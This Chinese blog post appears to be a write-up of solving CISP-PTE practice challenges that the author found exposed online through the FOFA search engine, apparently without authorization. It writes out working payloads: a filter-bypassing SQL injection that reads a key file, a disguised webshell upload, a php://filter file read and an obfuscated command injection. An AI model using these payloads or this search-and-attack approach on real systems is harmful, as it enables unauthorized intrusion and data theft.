image-20210707141654518

 

起源

一直想着去考pte,但是无奈于本人钱包并不支持。就想着有没有办法白嫖试题先试试水

image-20210707141723534

上神器fofa

1
body="CISP-PTE"

 

嘿嘿,还真有

image-20210707141915451

 

image-20210707141947886

 

二话不说,冲冲冲

 

基础题目之SQL注入

目标是通过SQL注入漏洞读取/tmp/360/key文件,拿到key的值

image-20210707141947886 image-20210707142155279

 

直接联合注入拿key吧,先order by查下页面能显示的字段,到7显示正常

image-20210707143422572

发现好像过滤了union

image-20210707143538012

采用双写union来绕过并读取文件

1
?id=-1') uniunionon select 1,2,3,load_file('/tmp/360/key'),5,6,7 --+
image-20210707144123333

 

基础题目之文件上传突破

目标是绕过waf上传webshell后拿到key

image-20210707152519324 image-20210707152920211

 

经过测试后发现,使用图片马并把后缀改成PhP后可以正常上传

image-20210707154752815

蚁剑连接拿到key

image-20210707154818731

 

基础题目之文件包含

目标是通过包含漏洞,获取webshell,拿到根目录下key

image-20210707155849505 image-20210707160047748

直接使用伪协议读取文件

1
?file=php://filter/read=convert.base64-encode/resource=key.php
image-20210707160331845

base64解一下,成功拿到key

image-20210707160413272

 

基础题目之命令执行

目标是通过命令执行绕过waf来读取文件中的key

image-20210707160736558 image-20210707160845609

使用&&来一起执行命令,发现常用的函数都被过滤了

image-20210707161812440

通过fuzz后发现c'a't可以使用

1
127.0.0.1&&c'a't ../key.php
image-20210707162409665

 

基础题目之日志分析

查看日志,分析出

image-20210707162708028

下载下来28M的日志。。。太多了,看着头疼

image-20210707170003094

先把状态码为200的先筛选出来吧

1
awk '($9 ~ /200/)' access.log.bak > ztm.log

然后在里面发现了一个很奇怪的url

image-20210707171844672

访问一下看看

1
/admin/backdoor.php
image-20210707172000937